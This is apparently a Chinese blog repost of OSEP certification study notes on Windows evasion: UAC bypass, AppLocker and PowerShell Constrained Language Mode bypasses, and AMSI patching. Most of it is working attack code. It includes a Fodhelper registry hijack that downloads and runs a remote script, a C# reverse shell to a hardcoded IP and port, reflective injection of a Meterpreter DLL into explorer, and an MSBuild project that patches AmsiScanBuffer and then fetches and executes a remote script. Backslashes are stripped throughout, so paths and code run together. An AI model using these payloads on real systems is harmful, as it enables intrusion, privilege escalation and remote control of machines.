关于笔记形式和学习方法请看OSEP学习之路 | 开篇
本篇是第三部分“免杀高级”技术,主要包括AMSI、uacbypass、applocker以及powershell的CLM模式,笔记基本是按照教材梳理的,章节不是一一对应,因为有些内容合并后更好理解
2-UAC Bypass
Fodhelper提权,powershell代码:
New-Item -Path HKCU:SoftwareClassesms-settingsshellopencommand -Value "powershell.exe (New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/run.txt') | IEX" -ForceNew-ItemProperty -Path HKCU:SoftwareClassesms-settingsshellopencommand -Name DelegateExecute -PropertyType String -ForceC:WindowsSystem32fodhelper.exe
3-Applocker绕过
3.1-可信文件夹
C:WindowsTasksC:WindowsTempC:Windowstracing
3.2-DLL绕过
// dllmain.cpp : Defines the entry point for the DLL application.BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved){switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;}extern "C" __declspec(dllexport) void run(){MessageBoxA(NULL, "Execution happened", "Bypass", MB_OK);}
运行
rundll32 xxx,run3.3-ADS绕过
如果能向某个受信任的目录或文件写入内容,也就是可以修改受信任目录中的文件内容,这通常发生在软件的错误权限配置处
3.4-第三方执行
比如安装了python,perl等脚本语言,是可以执行系统命令的
3.5-Powershell CLM模式
检查CLM模式
$ExecutionContext.SessionState.LanguageMode3.6-Powershell CLM模式绕过
3.6.1-Custom Runspaces
using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Management.Automation;using System.Management.Automation.Runspaces;namespace CLM_bypass_1{internal class Program{static void Main(string[] args){Runspace rs = RunspaceFactory.CreateRunspace();rs.Open();PowerShell ps = PowerShell.Create();ps.Runspace = rs;String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\Tools\test.txt";ps.AddScript(cmd);ps.Invoke();rs.Close();}}}
3.6.2-Combine with InstallUtil
上一个方法仅仅是绕过了CLM,但是我们还是需要想办法执行exe.
C:WindowsMicrosoft.NETFramework64v4.0.30319installutil.exe /logfile= /LogToConsole=false /U .InstallUtilBypass.exe
using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Management.Automation;using System.Management.Automation.Runspaces;using System.Collections;namespace InstallUtilBypass{class Program{static void Main(string[] args){Console.WriteLine("This is the main method which is a decoy.");}}[System.ComponentModel.RunInstaller(true)]public class Sample : System.Configuration.Install.Installer{public override void Uninstall(IDictionary savedState){String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\Tools\test1.txt";Runspace rs = RunspaceFactory.CreateRunspace();rs.Open();PowerShell ps = PowerShell.Create();ps.Runspace = rs;ps.AddScript(cmd);ps.Invoke();rs.Close();}}}
文件传输命令:
certutil -encode clm_bypass_1.exe file.txtbitsadmin /Transfer myJob http://192.168.203.214/file.txt enc.txtcertutil -decode enc.txt clm_bypass1.exe
String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.119.120/met.dll');(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/InvokeReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; InvokeReflectivePEInjection -PEBytes $bytes -ProcId $procid";
3.7-使用C#绕过
思路如下:
需要找一个能够接收文件输入的程序,而且需要将我们的输入作为源码编译执行
这个程序必须位于白名单里
run.xml
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler"><files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><d2p1:string>test.txt</d2p1:string></files><parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler"><assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /><compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /><coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName><embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /><evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /><generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable><generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateInMemory><includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation><linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /><mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /><outputName i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /><tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /><treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors><warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel><win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /><d2p1:checkTypes>false</d2p1:checkTypes><d2p1:compileWithNoCode>false</d2p1:compileWithNoCode><d2p1:compilerOptions i:nil="true" /><d2p1:generateCCU>false</d2p1:generateCCU><d2p1:languageToUse>CSharp</d2p1:languageToUse><d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" /><d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" /><d2p1:mtInfo i:nil="true" /><d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" /></parameters></CompilerInput>
test.txt
using System;using System.Workflow.ComponentModel;public class Run : Activity{public Run(){Console.WriteLine("I executed!");}}
C#反弹shell代码
using System;using System.Text;using System.IO;using System.Diagnostics;using System.ComponentModel;using System.Net;using System.Net.Sockets;using System.Workflow.ComponentModel;public class Run : Activity{static StreamWriter streamWriter;private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine){StringBuilder strOutput = new StringBuilder();if (!String.IsNullOrEmpty(outLine.Data)){try{strOutput.Append(outLine.Data);streamWriter.WriteLine(strOutput);streamWriter.Flush();}catch (Exception err) { }}}public Run(){Console.WriteLine("I executed!");using(TcpClient client = new TcpClient("192.168.203.214", 1337)){using(Stream stream = client.GetStream()){using(StreamReader rdr = new StreamReader(stream)){streamWriter = new StreamWriter(stream);StringBuilder strInput = new StringBuilder();Process p = new Process();p.StartInfo.FileName = "cmd.exe";p.StartInfo.CreateNoWindow = true;p.StartInfo.UseShellExecute = false;p.StartInfo.RedirectStandardOutput = true;p.StartInfo.RedirectStandardInput = true;p.StartInfo.RedirectStandardError = true;p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);p.Start();p.BeginOutputReadLine();while(true){strInput.Append(rdr.ReadLine());//strInput.Append("n");p.StandardInput.WriteLine(strInput);strInput.Remove(0, strInput.Length);}}}}}}
编译
c:windowsMicrosoft.NETFramework64v4.0.30319Microsoft.Workflow.Compiler.exe .run.xml result.xml3.8-使用JScript绕过
3.8.1-HTA
<html> <head><script language="JScript">var shell = new ActiveXObject("WScript.Shell"); var res = shell.Run("cmd.exe"); </script> </head> <body><script language="JScript">self.close(); </script> </body> </html>
快捷方式
c:windowssystem32mshta.exe http://10.8.0.2:8000/test.hta3.8.2-XSL Transform
<stylesheet version="1.0" xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace"><output method="text"/><ms:script implements-prefix="user" language="JScript"><![CDATA[ var r = new ActiveXObject("WScript.Shell"); r.Run("cmd.exe");]]></ms:script></stylesheet>
wmic process get brief /format:"http://192.168.119.120/test.xsl"3.9-MSBuild
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"><!-- C:WindowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe pwn.csproj --><!-- Bypass CLM and disables AMSI --><!-- Author: Casey Smith, Twitter: @subTee --><!-- License: BSD 3-Clause --><Target Name="Bypass"><BypassCLM/></Target><UsingTaskTaskName="BypassCLM"TaskFactory="CodeTaskFactory"AssemblyFile="C:WindowsMicrosoft.NetFrameworkv4.0.30319Microsoft.Build.Tasks.v4.0.dll" ><Task><Reference Include="System.Management.Automation" /><Code Type="Class" Language="cs"><![CDATA[using System;using System.IO;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;using System.ComponentModel;using System.Collections.Generic;using System.Collections.ObjectModel;using System.Runtime.InteropServices;using System.Management.Automation;using System.Management.Automation.Runspaces;public class BypassCLM : Task, ITask{[]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);[]public static extern IntPtr LoadLibrary(string name);[]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);static int Bypass(){char[] chars = { 'A', 'm', 's', 'i', 'S', 'c', 'a', 'n', 'B', 'u', 'f', 'f', 'e', 'r' };String funcName = string.Join("", chars);char[] chars2 = { 'a', 'm', 's', 'i', '.', 'd', 'l', 'l' };String libName = string.Join("", chars2);IntPtr Address = GetProcAddress(LoadLibrary(libName), funcName);UIntPtr size = (UIntPtr)5;uint p = 0;VirtualProtect(Address, size, 0x40, out p);Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };Marshal.Copy(Patch, 0, Address, 6);return 0;}public override bool Execute(){Runspace run = RunspaceFactory.CreateRunspace();run.Open();Console.WriteLine(Bypass());PowerShell shell = PowerShell.Create();shell.Runspace = run;String exec = "iex(new-object net.webclient).downloadstring('http://192.168.203.214/run.txt')"; // Modify for custom commandsshell.AddScript(exec);shell.Invoke();Collection<PSObject> output = shell.Invoke();foreach( PSObject o in output ){Console.WriteLine(o.ToString());}foreach( ErrorRecord err in shell.Streams.Error ){Console.Write("Error: " + err.ToString());}run.Close();return true;}}]]></Code></Task></UsingTask></Project>
C:WindowsMicrosoft.NETFrameworkv4.0.30319MSBuild.exe c:userstestdesktoppwn.csproj
在使用nishang反弹shell
坚持自律做最好的自己
原文始发于微信公众号(高级红队专家):OSEP | 免杀高级-中
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论